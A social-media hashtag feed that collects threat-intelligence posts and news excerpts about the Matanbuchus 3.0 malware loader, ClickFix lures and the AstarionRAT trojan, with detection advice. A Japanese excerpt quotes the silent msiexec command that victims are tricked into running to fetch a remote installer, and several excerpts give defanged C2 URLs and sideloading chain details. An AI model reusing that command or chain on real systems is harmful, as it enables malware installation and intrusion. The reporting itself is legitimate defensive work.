#Matanbuchus
Matanbuchus 3.0 resurfaces, exploiting ClickFix tactics for stealthy AstarionRAT deployment. Stay vigilant against advanced social engineering attacks. #PotatoSecurity #Matanbuchus #AstarionRAT #ClickFix Link: thedailytechfeed.com/matanbuchus-...
February 18, 2026 at 6:35 PM
Feed: "Cyber Security News"
By: Varshini on Wednesday, February 18, 2026
ClickFix Social Engineering Fuels Matanbuchus 3.0 AstarionRAT Attack
Cybersecurity researchers uncovered a sophisticated attack chain where attackers used ClickFix social engineering to deliver Matanbuchus 3.0
cyberpress.org
February 18, 2026 at 6:13 PM
Matanbuchus 3.0 resurfaces, exploiting ClickFix tactics for stealthy AstarionRAT deployment. Stay vigilant against advanced social engineering attacks. #CyberSecurity #Matanbuchus #AstarionRAT #ClickFix Link: thedailytechfeed.com/matanbuchus-...
February 18, 2026 at 5:20 PM
Huntress researchers Anna Pham & Michael Tigges look into a recent intrusion started from a ClickFix case leading to Matanbuchus 3.0, a premium Malware-as-a-Service (MaaS) loader and custom new implant AstarionRAT. www.huntress.com/blog/clickfi...
February 18, 2026 at 12:26 PM
ClickFix ソーシャルエンジニアリング、Matanbuchus 3.0 AstarionRAT 攻撃を引き起こす

サイバーセキュリティ研究者は、攻撃者が ClickFix ソーシャルエンジニアリングを使用して Matanbuchus 3.0 マルウェアを配信し、最終的に AstarionRAT という新しいリモートアクセストロジャンを展開した洗練された攻撃チェーンを発見しました。 この侵害は 2026 年 2 月に組織を標的とし、ドメインコントローラーへの急速な横展開を特徴としていました。Huntress…
ClickFix ソーシャルエンジニアリング、Matanbuchus 3.0 AstarionRAT 攻撃を引き起こす
サイバーセキュリティ研究者は、攻撃者が ClickFix ソーシャルエンジニアリングを使用して Matanbuchus 3.0 マルウェアを配信し、最終的に AstarionRAT という新しいリモートアクセストロジャンを展開した洗練された攻撃チェーンを発見しました。 この侵害は 2026 年 2 月に組織を標的とし、ドメインコントローラーへの急速な横展開を特徴としていました。Huntress チームは、攻撃者がランサムウェアまたはデータ流出の目標を達成する前に、この操作を中断しました。 被害者は「C:\WINDOWS\system32\mSiexeC.EXe」-PaCkAGe hxxp://binclloudapp[.]com/temp/../ValidationID/../466943 /q を実行し、サイレント MSI インストーラーをダウンロードします。 MSI は %APPDATA%\Cybernetics Ltd\Threat Fabric などの正規のセキュリティソフトウェアを模したパスにファイルを抽出し、DLL サイドローディング用に Zillya Antivirus バイナリを使用します。 リネームされた Zillya AV コンポーネントである Core.exe は、Matanbuchus 3.0 である悪意のある SystemStatus.dll を読み込みます。 このローダーは INFO から ShellCode を復号化し、ChaCha20 暗号化を経由して hxxps://marle[.]io/checkupd/profile.aspx からメインモジュールをダウンロードし、%LOCALAPPDATA%\ndvyxgdriggmarrf に 2 段階目のパッケージをドロップします。 Java.exe は偽の jli.dll を読み込み、Lua 5.4.7 インタープリターを組み込んで SySUpd スクリプトを実行します。Lua スクリプトは、メモリ内で AstarionRAT を再構成して実行するリフレクティブ PE ローダーをトリガーします。
blackhatnews.tokyo
February 18, 2026 at 11:00 AM
ClickFix Social Engineering Fuels Matanbuchus 3.0 AstarionRAT Attack Cybersecurity researchers uncovered a sophisticated attack chain where attackers used ClickFix social engineering to deliver Mat...

#Cyber #Attack #Cyber #security #news #malware #Cyber […]

[Original post on cyberpress.org]
February 18, 2026 at 11:06 AM
Matanbuchus 3.0 Returns with ClickFix Social Engineering and Silent MSI Installations to Deploy AstarionRAT
Matanbuchus 3.0 Returns with ClickFix Social Engineering and Silent MSI Installations to Deploy AstarionRAT
Matanbuchus, a premium Malware-as-a-Service loader, has resurfaced in February 2026 following a nearly year-long hiatus. This latest iteration, version 3.0, features a complete code rewrite and now commands a subscription fee of up to $15,000 per month, a stark increase from its original pricing. This shift signals a focus on high-value targeted operations rather than mass spam campaigns. The malware leverages the persistent “ClickFix” social engineering tactic, which tricks users into manually executing malicious commands under the guise of resolving fake browser errors or software updates. The attack vector bypasses traditional security controls by manipulating human trust rather than exploiting software vulnerabilities. Victims are presented with deceptive prompts instructing them to copy and paste specific PowerShell or Run dialog commands. The malicious URL leverages backslashes and path traversal sequences to confuse logging systems. Since the user technically initiates the process, many standard email and perimeter defenses are evaded. Once executed, the command triggers a silent installation process that operates without any visible user interface. Huntress analysts identified that this campaign delivers a previously unseen payload dubbed AstarionRAT immediately following the infection. This custom remote access trojan is equipped with twenty-four distinct commands, including credential theft and SOCKS5 proxying. The impact is often immediate, with operators moving laterally across the network within forty minutes to target domain controllers. The ultimate goal appears to be ransomware deployment or data exfiltration, making early detection critical for enterprise security teams. The Silent Infection Chain The infection mechanism is deeply layered to evade automated detection. It begins when the victim executes a mixed-case  msiexec  command that fetches a payload from a newly registered domain. Upon execution, the installer drops a legitimate but vulnerable Zillya Antivirus binary alongside a malicious DLL into deceptive directories mimicking fake vendors like “AegisLynx” or “DocuRay”. Matanbuchus 3.0 advertisement (Source – Huntress) To further mask its activities, the malware utilizes a renamed version of the 7-Zip utility to extract a password-protected archive containing the next stage components. The malicious DLL is then side-loaded by the antivirus engine to decrypt the Matanbuchus loader. A graph overview of the Matanbuchus DLL (Source – Huntress) This complex chain eventually launches an embedded Lua interpreter which executes the final AstarionRAT payload directly into memory, leaving minimal forensic artifacts on the disk for investigators to find. Security teams should configure endpoint detection systems to flag  msiexec  commands containing mixed-case characters or suspicious URL patterns. It is critical to monitor for the creation of unusual directories in  %APPDATA%  and verify network connections to recently registered domains. Finally, train employees to never paste raw commands into their terminals. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post Matanbuchus 3.0 Returns with ClickFix Social Engineering and Silent MSI Installations to Deploy AstarionRAT appeared first on Cyber Security News .
cybersecuritynews.com
February 18, 2026 at 3:26 AM
Read more:
www.technadu.com/clickfix-inf...

How can organizations better detect rapid lateral movement? Comment your opinion below.
#CyberSecurity #Malware #IncidentResponse #ThreatIntelligence #RAT
ClickFix Infection Delivers Matanbuchus 3.0 Malware and New AstarionRAT in High-Speed Intrusion
Huntress uncovers a new RAT, AstarionRAT, delivered via a ClickFix infection and Matanbuchus 3.0 malware in a high-speed cyberattack.
www.technadu.com
February 17, 2026 at 1:05 PM
ClickFix social engineering led to Matanbuchus 3.0 + new AstarionRAT deployment.

Attackers hit domain controllers in under 40 mins.
Rapid lateral movement using legit tools.

#CyberSecurity #ThreatIntel #Malware
February 17, 2026 at 1:05 PM
We don't usually see hands-on-keyboard intrusions from #ClickFix
@HuntressLabs
BUT... when we do... oh boiii.... it's clickfix -> matanbuchus -> AstarionRAT and a lateral movement for extra fl…

🔁 RT @RussianPanda9xx | reposted by @gleeda
https://x.com/RussianPanda9xx/status/2023445074001227955
A New RAT and a Hands-on-Keyboard Intrusion | Huntress
t.co
February 16, 2026 at 11:36 PM
Matanbuchus malware resurfaces with advanced evasion tactics, delivering ransomware via disguised MSI files. Stay vigilant! #CyberSecurity #Malware #Ransomware #ThreatDetection Link: thedailytechfeed.com/matanbuchus-...
January 30, 2026 at 6:54 PM
Zscaler ThreatLabz調査。既存の静的スキャン系などには引っかからない工夫がされているようす…:Matanbuchus Malware Downloader Evading AV Detections by Changing Components https://cybersecuritynews.com/matanbuchus-malware-downloader-evading-av-detections/
Matanbuchus Malware Downloader Evading AV Detections by Changing Components
Matanbuchus malware has resurfaced, using fake MSI installers to quietly deliver ransomware and other payloads while evading detection.
cybersecuritynews.com
January 30, 2026 at 12:43 AM
Matanbuchus Malware Downloader Evading AV Detections by Changing Components
Matanbuchus Malware Downloader Evading AV Detections by Changing Components
Matanbuchus is once again drawing attention in the cybersecurity community as it quietly returns to the threat landscape with refined tactics and better tools to avoid detection. This malware, known for its role as a stealthy downloader, is actively being used to deliver more dangerous payloads, including ransomware, onto targeted systems. Recent activity shows that operators behind Matanbuchus are not only reviving the malware but also reshaping its delivery methods to blend in with normal enterprise activity. The latest wave of campaigns relies heavily on Microsoft Installer (MSI) files to drop the Matanbuchus downloader on victim machines. These MSI packages look harmless at first glance and are often disguised as legitimate software installers or updates, making it easier for attackers to trick users and bypass basic security checks. Once a user runs the file, the downloader silently installs itself and prepares the infected host for the next stage of the attack. Zscaler ThreatLabz researchers noted that Matanbuchus has been continuously changing several of its internal components to evade antivirus and machine learning-based security tools. By frequently modifying key parts of the downloader, including its code structure and behavioral patterns, the operators reduce the chances of being flagged by static signatures or behavior-based rules. Matanbuchus has been continuously making changes to various components to evade AV/ML detection. The group is currently leveraging Microsoft Installer (MSI) files to drop the downloader module with some samples having zero detections: https://t.co/TtB8u0Rxdv The C2 for this… — Zscaler ThreatLabz (@Threatlabz) January 28, 2026 This constant evolution means that some recent samples have shown zero detections on popular scanning platforms at the time of discovery. In ongoing campaigns , the Matanbuchus operators use MSI-based loaders to reach out to their command-and-control (C2) server and retrieve updated payloads. One of the known C2 endpoints linked to this activity is hosted at hxxps://nady[.]io/check/robot.aspx, which acts as a control hub for delivering further stages of the attack. Once communication is established, Matanbuchus can download additional malware, move laterally, or prepare the environment for ransomware deployment, depending on the attacker’s goals. Focus on Detection Evasion and Component Changes A key factor that makes this Matanbuchus wave dangerous is its aggressive focus on detection evasion. Instead of relying on a fixed codebase, the actors regularly tweak loader components, configuration formats, and obfuscation layers. These changes are subtle enough to preserve functionality while altering the malware’s footprint, helping it slip past antivirus engines and some machine learning models that depend on known patterns and features. Zscaler ThreatLabz analysts identified that the malware’s use of altered MSI structures and updated downloader logic is central to this strategy. By constantly rotating elements such as strings, encryption routines, and network indicators, Matanbuchus minimizes reuse of artifacts that defenders typically track. This approach forces security teams to look beyond simple indicators and focus on higher-level behaviors, such as unusual MSI execution patterns, suspicious outbound connections, and post-installation process activity. Defenders who rely only on static IOCs risk missing newer samples that share very little overlap with older versions. As Matanbuchus continues to adapt, organizations must harden defenses around script execution, installer handling, and outbound network traffic. Security teams should pay special attention to MSI-based installation events that spawn unexpected processes or initiate external connections soon after execution. Combining behavioral monitoring with threat intelligence can help close the visibility gap and reduce the window of opportunity for attackers using Matanbuchus and similar modular downloaders. Follow us on  Google News ,  LinkedIn , and  X  to Get More Instant Updates ,  Set CSN as a Preferred Source in  Google . The post Matanbuchus Malware Downloader Evading AV Detections by Changing Components appeared first on Cyber Security News .
cybersecuritynews.com
January 29, 2026 at 5:29 PM
Matanbuchus Malware Downloader Evading AV Detections by Changing Components Matanbuchus is once again drawing attention in the cybersecurity community as it quietly returns to the threat landscape ...

#cyber #security #news #Threats #cyber #security #Cyber #Security #News

Origin | Interest | Match
Matanbuchus Malware Downloader Evading AV Detections by Changing Components
Matanbuchus malware has resurfaced, using fake MSI installers to quietly deliver ransomware and other payloads while evading detection.
cybersecuritynews.com
January 29, 2026 at 6:50 PM
Feed: "Cyber Security News"
By: Varshini on Thursday, January 29, 2026
Evolving Matanbuchus Malware Swaps Parts To Slip Past Antivirus Defenses
Researchers recently warned that the Matanbuchus downloader malware keeps altering its components to bypass antivirus and machine
cyberpress.org
January 29, 2026 at 1:10 PM
Matanbuchus Malware Evolves Again, Slips Past Antivirus With MSI-Based Delivery

Introduction: A Malware That Refuses to Stand Still Cybersecurity researchers are raising fresh alarms over Matanbuchus, a long-running downloader malware that continues to reinvent itself to evade detection. Once…
Matanbuchus Malware Evolves Again, Slips Past Antivirus With MSI-Based Delivery
Introduction: A Malware That Refuses to Stand Still Cybersecurity researchers are raising fresh alarms over Matanbuchus, a long-running downloader malware that continues to reinvent itself to evade detection. Once considered a relatively straightforward loader, Matanbuchus has transformed into a highly adaptable Malware-as-a-Service (MaaS) platform, closely tied to ransomware operations. Its latest evolution shows a deliberate focus on bypassing both traditional antivirus engines and modern machine-learning defenses, forcing defenders into a constant game of catch-up.
undercodenews.com
January 29, 2026 at 9:06 AM
Evolving Matanbuchus Malware Swaps Parts To Slip Past Antivirus Defenses Researchers warned that the Matanbuchus downloader malware keeps altering its components to bypass antivirus and machine lea...

#Cyber #security #news #malware #Cyber #Security #News #Malware

Origin | Interest | Match
January 29, 2026 at 8:30 AM
Matanbuchus added new DLL sideloading techniques after older ones started getting flagged by some EDRs.
January 14, 2026 at 7:20 PM
GrayBravo's CastleLoader ecosystem includes four clusters; TAG-160 impersonates logistics and abuses freight-matching platforms with ClickFix, TAG-161 impersonates Booking.com delivering CastleLoader and Matanbuchus. #GrayBravo #CastleLoader #ClickFix https://bit.ly/4p49yc0
December 13, 2025 at 7:19 PM
CastleLoader in the wild! Four distinct activity clusters, sector-specific targeting of logistics, and high-end tooling like Matanbuchus and CastleRAT.
1/ @whoisnt.bsky.social, Marius, and I just published a report on #GrayBravo (formerly TAG-150), a highly adaptive, sophisticated threat actor that we first identified in Sept 2025. It uses a multi-layered infrastructure and responds quickly to exposure: www.recordedfuture.com/research/gra...
GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries
www.recordedfuture.com
December 9, 2025 at 3:43 PM
Recorded Future’s Insikt Group uncovered four GrayBravo activity clusters. TAG-160 impersonates logistics firms, while TAG-161 impersonates Booking.com, employing ClickFix to deliver CastleLoader and Matanbuchus. www.recordedfuture.com/research/gra...
December 9, 2025 at 11:25 AM
7/ Another cluster, we track as TAG-161, impersonates Booking[.]com. This group also relies on ClickFix for CastleLoader delivery and deploys advanced payloads, including Matanbuchus.
December 9, 2025 at 8:24 AM
Cybercriminals are leveraging Matanbuchus 3.0 to deploy ransomware and maintain system control. Stay vigilant and implement robust security measures. #CyberSecurity #Matanbuchus #Ransomware #InfoSec Link: thedailytechfeed.com/cybercrimina...
December 4, 2025 at 3:30 PM
Threat Actors Using Matanbuchus Downloader to Deliver Ransomware and Maintain Persistence https://gbhackers.com/matanbuchus-downloader/
December 4, 2025 at 7:06 AM